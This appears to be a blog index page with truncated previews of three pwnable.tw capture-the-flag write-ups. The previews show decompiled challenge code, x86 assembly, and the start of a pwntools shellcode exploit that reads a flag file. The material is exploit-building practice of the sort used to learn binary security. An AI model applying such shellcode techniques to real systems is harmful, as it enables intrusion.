Write-ups/pwnable.tw
-
hacknote - pwnable.tw (Write-ups/pwnable.tw, 2020. 2. 13. 18:31)
Prob Info void __cdecl __noreturn main() { int v0; // eax char buf; // [esp+8h] [ebp-10h] unsigned int v2; // [esp+Ch] [ebp-Ch] v2 = __readgsdword(0x14u); setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 2, 0); while ( 1 ) { while ( 1 ) { menu(); read(0, &buf, 4u); v0 = atoi(&buf); if ( v0 != 2 ) break; delete_note(); } if ( v0 > 2 ) { if ( v0 == 3 ) { print_note(); } else { if ( v0 == 4 ) exit(0); L..
-
orw - pwnable.tw (Write-ups/pwnable.tw, 2020. 2. 13. 16:44)
Prob Info int __cdecl main(int argc, const char **argv, const char **envp) { orw_seccomp(); printf("Give my your shellcode:"); read(0, &shellcode, 0xC8u); ((void (*)(void))shellcode)(); return 0; } orw_seccomp sets up a sandbox, so the flag can be read with open, read, and write. Roughly putting the shellcode together with pwntools is convenient. shellcode = shellcraft.open('/home/orw/flag') shellcode += shellcraft.read('eax','esp',100) shellcode += shellcraft.write(..
-
start - pwnable.tw (Write-ups/pwnable.tw, 2020. 2. 13. 16:17)
Prob Info No protection mechanisms are applied. It is expected to be a simple shellcoding problem. public _start _start proc near push esp push offset _exit xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx push 3A465443h push 20656874h push 20747261h push 74732073h push 2774654Ch mov ecx, esp ; addr mov dl, 14h ; len mov bl, 1 ; fd mov al, 4 int 80h ; LINUX - sys_write xor ebx, ebx mov dl, 3Ch mov al, 3 int 80h ; LINUX - add esp, 14h retn 문제에 메..